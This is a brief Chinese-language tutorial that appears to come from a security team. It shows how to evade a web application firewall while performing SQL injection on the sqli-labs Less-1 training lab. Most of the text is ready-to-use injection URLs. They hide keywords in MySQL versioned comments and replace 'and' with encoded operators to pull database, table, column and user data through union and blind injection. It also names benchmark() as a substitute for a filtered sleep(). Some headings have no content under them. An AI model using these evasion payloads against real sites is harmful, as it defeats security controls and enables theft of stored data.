作者:ghtwf01@星盟安全团队
前言
这里使用sqli-labs第一关字符型注入来测试
绕过and 1=1
直接使用and 1=1肯定会被拦截
使用%26%26即可代替and绕过,1=1可以用True表示,1=2可以用False表示
绕过order by
直接使用order by被拦截
使用order/*!60000ghtwf01*/by绕过
绕过union select
和order by一样绕过姿势,使用union/*!60000ghtwf01*/select绕过
查询数据库名
过滤了group_concat(),限制了select与from的结合,from.无法绕过,使用/*!00000select*/绕过
http://192.168.0.7/sqli/Less-1/?id=0%27%20union/*!60000ghtwf01*//*!00000select*/%201,2,schema_name%20from%20information_schema.schemata%20limit%200,1--+
查询表名
http://192.168.0.7/sqli/Less-1/?id=0%27%20union/*!60000ghtwf01*//*!00000select*/%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%200,1--+
查询列名
and用%26%26代替
查询字段
盲注
布尔盲注
查询数据库名长度
http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20length(database/**/())=8%20--+
查询第一个数据库名第一个字母ascii()、hex()均未被过滤,限制select与from的结合,使用/*!00000select*/
http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(ascii(substr((/*!00000select*/%20schema_name%20from%20information_schema.schemata%20limit%200,1),1,1))=105)%20--+
查询security数据库第一个表名第一个字母
http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(hex(substr((/*!00000select*/%20table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%200,1),1,1))=65)%20--+
查询users表第一个列名第一个字母
http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(hex(substr((/*!00000select*/%20column_name%20from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20%26%26%20table_name=0x7573657273%20limit%200,1),1,1))=69)%20--+
查询字段
http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(hex(substr((/*!00000select*/%20username%20from%20users%20limit%200,1),1,1))=44)%20--+
时间盲注
过滤了sleep()函数,使用benchmark()函数即可,查询规则参考上面布尔盲注